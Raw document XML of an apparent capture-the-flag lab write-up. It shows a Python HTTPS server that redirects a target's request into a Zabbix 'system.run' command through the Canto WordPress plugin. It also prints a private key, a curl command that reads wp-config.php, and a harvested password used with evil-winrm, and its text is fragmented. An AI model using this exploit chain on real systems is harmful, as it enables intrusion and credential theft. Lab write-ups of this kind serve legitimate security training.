    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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key = f'system.run[({cmd})]'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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url += urllib.parse.quote_plus(header).replace("+", "%20").replace("%2F", "/").replace("%25", "%").replace("%3A", ":")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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url += urllib.parse.quote_plus(struct.pack("&lt;Q", len(key)+2).decode()).replace("+", "%20").replace("%2F", "/").replace("%25", "%").replace("%3A", ":")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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url += urllib.parse.quote_plus(key).replace("+", "%20").replace("%2F", "/").replace("%25", "%").replace("%3A", ":")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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return url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:jc w:val="both"/>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4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class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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def do_GET(self):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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parsed = urllib.parse.urlparse(self.path)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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cmd = base64.b64decode(urllib.parse.parse_qs(parsed.query)['cmd'][0]).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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self.send_response(302)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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self.send_header('Location', command(cmd))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:jc w:val="both"/>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4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server_address = ('0.0.0.0', 443)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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httpd.socket = ssl.wrap_socket(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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httpd.socket,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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server_side=True,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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certfile='localhost.pem',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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ssl_version=ssl.PROTOCOL_TLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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httpd.serve_forever()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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5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localhost.pem:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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-----BEGIN PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQC/BI8dIQ/iTwxQ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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quonIWoAVhAAuG3U13wNIzov1qvL/DHQqKKqyPkpkfDz4aJWnGmWy4RM2q3Wp4Tc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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VIMddnmYfTTq75WI/Q6aoAmuA0m7KSMVbY2IuJM4EKkrmo82G0c7nGc/E8S9Novp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trendin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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g-Programming-Languages.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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A0nvXdd33U//Qg5kOclnjmgoNcxBrBRjf496GwxfIEQOzwHqBPg4qKAGQxBfsWYQ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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umTKFE/432wbhkotdgyBfbhGxD0VXBr+gKUyGGaUiJMIT+z5gFtt5oxVmWpLKa03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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8iIwcyxxYJrHLTGalSbxiGFbDvyY/9eW59DT4a3jLVTkeJEECkRbudD1U6hJ1w32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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zsOc7/4zAgMBAAECggEBALEKA66GxxcEFrDpR+4OjRVUrq5MQRdkxIfUn4hZGY8M</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5gqzUViivjPmHIGdHX3SqBZn9+3XPAlX587h0UfMV7SaTyJz/Y8io5dyPqZ2S67Y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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2Lhyehw+ncv3vSM5tAP80k+QjSysIMsRtCi5sJvWyO5CQ3OcgIQp/t4o4aZq/i3a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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OPt/bPlB3gMV2rE/X5IzdHu4WFXFudbmCWoU9Duylu4m7DEvPMVgfaJPBqzY+/yW</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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iblUfkgZ8wdCmha16qpGG8GLVEM2e0ih9Rwx+ZQX+yzF3w9jAVbU7t6Ef0KSl3uv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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MXjJvmU+SiFp9wfJA76edEikkeECxxeuIOM0ndPIHuECgYEA8PR0ivTWYlLi9fP6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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ixtoXkIR4VwVPSTX8ovQoEkBbC3FcbGHdJF2+rGlBXhOtXQEV0aTA78U8N25rYBE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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RCiHJirTJw2+7N9A4U0ti5bZeDxzcG8CqAmX7bYAc1NM9EuEZX00nl5i8CSTAUUk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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NMh7SY5oF+5TLPu3j+kvA9QQLbECgYEAyvHiUtRZBQu4vU+tPl72U+T+WSapYeeX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Fz5vTm7lmvdEXgnnlA6NgKLV96tsp47JsmnvlFbc9XD9i/YJ4AS/LDO5zERJ+zXh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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lQvcWNa21Y/vyIwfqR0LPh2JyQEt9tyF/5ocKU4ML7RtqIS489elX1MNx+xvNBJv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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R/c0UHIKbyMCgYBe8fR6TL+tPrvv7pNq/QHDIoWpJ3+2+C2fhThP8HR/DAohIrMd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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W7RmVFmSLjXVikGrokOL1l+KCdSAaWp88PtQLs/FM8Vn0RDftmmb93T5y9gxFY0W</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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abFUGcNTrh9Eo/0ngI6bWNXjioXimjwKEHWEJnkd9OsRbp6GNnwwJf+6AQKBgQCh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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/EufvWqIgoCkanJndDi9Yew6kIdmZAnPPcBuJEoUVQU24kT7glojsNWEaEnDvE71</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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n2ThTCv1pIhcLLhZHLDSwT6t8lvyrWEvLFZmeotZDxhfRKkIvOv6Wm1eCRj9D6vN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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Bt8vgOJtOWDFv5o414lh+tLnHqrsL0KveHtDMqNtbQKBgQDl6Ip8+nLobwVSimjv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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p7h/dtkgGiEYHZv/Xopw69mb1iKuXsEDzhGsirzVnrqixUMZNIFqnvLrAb4jWblM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/cn/x0Zwd2BRF4zUuPZmA21hUrB1ZNy68HsG9eftcZnrLD9o91fECabWbalVvYFr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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H6CsOM3jOS8HlrLn84KlK2s5tA==</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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-----END PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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-----BEGIN CERTIFICATE-----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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MIIDazCCAlOgAwIBAgIUKAhPEjY/t7hTKItzqn7/RicVPDYwDQYJKoZIhvcNAQEL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTA3MjEwMjE5MTZaFw0yMjA3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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MjEwMjE5MTZaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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AQUAA4IBDwAwggEKAoIBAQC/BI8dIQ/iTwxQquonIWoAVhAAuG3U13wNIzov1qvL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/DHQqKKqyPkpkfDz4aJWnGmWy4RM2q3Wp4TcVIMddnmYfTTq75WI/Q6aoAmuA0m7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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KSMVbY2IuJM4EKkrmo82G0c7nGc/E8S9NovpA0nvXdd33U//Qg5kOclnjmgoNcxB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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rBRjf496GwxfIEQOzwHqBPg4qKAGQxBfsWYQumTKFE/432wbhkotdgyBfbhGxD0V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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XBr+gKUyGGaUiJMIT+z5gFtt5oxVmWpLKa038iIwcyxxYJrHLTGalSbxiGFbDvyY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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/9eW59DT4a3jLVTkeJEECkRbudD1U6hJ1w32zsOc7/4zAgMBAAGjUzBRMB0GA1Ud</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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DgQWBBQjPFghETfTWngLxHBE27m7zStYRjAfBgNVHSMEGDAWgBQjPFghETfTWngL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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xHBE27m7zStYRjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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ZS+1qHF7fGCHthIS26ORCnSNafmVc2BCXU71h5vJ0r9GCpejX03JIjcDxzU8FQ0z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Yeq72Dkro5DFY6kn4AS4KSQMyRTslj+p3doXZySWCvOnWULxGRLMiw1P2L+ArV0/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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9vZviUHzUXu6cy3E2irqYlbIql09evleTf5N/7rEmtmTmy2MKo9Z/7qE+woZSkqs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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Wcu1Irz4T7kFaSDf6WJxDcmb5a3xqQGAj0UXnAdeFeefHszD9vi8064gTzGzJ94A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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M8Ypw9xifpE9HM0fSDlH2dgfooiyM28BcxzfE4181Zjvr823J6rLzG6QjjG9/amU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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GBYj0ALZdBryf5KmXoWm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-----END CERTIFICATE-----</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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This exploit works as a server, because we must use HTTPS. We will send a request using curl, and our Python exploit will respond to the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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First, execute our exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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46300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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9436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send a curl request executing a command on the target system. We can now enumerate the target server. Since we know WordPress is running, let’s read the configuration file →</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wp-config.php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8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curl "http://smuggler.uhclabs/wp-content/plugins/canto/includes/lib/detail.php?subdomain=&lt;IP-VPN&gt;/&amp;id=?cmd=$(echo -n 'type c:\inetpub\wwwroot\wp-config.php' | base64)" --output -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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8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060700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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try using this password to log in as another user. To do this, we list existing users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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562100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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9436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find the user</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zabbix</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can list which groups this user belongs to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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19300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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9436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We see that the user is part of groups such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Desktop Users, Remote Management Users, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Evil-WinRM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and attempt access using the database password found in the WordPress configuration file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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evil-winrm -i smuggler.uhclabs -u zabbix -p Sup3rP@ssw0rd.@Smuggl3r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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11400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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59436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Navigating to the root directory, we retrieve our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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78100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.a4c5vt85cg8k" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">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rtiqp720bro7" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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Since executing commands via the Zabbix script runs as a service user, if we obtain a shell as that user, we can impersonate and elevate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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issue with obtaining a shell directly via curl is that it drops our shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (timeout issue generated by curl)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
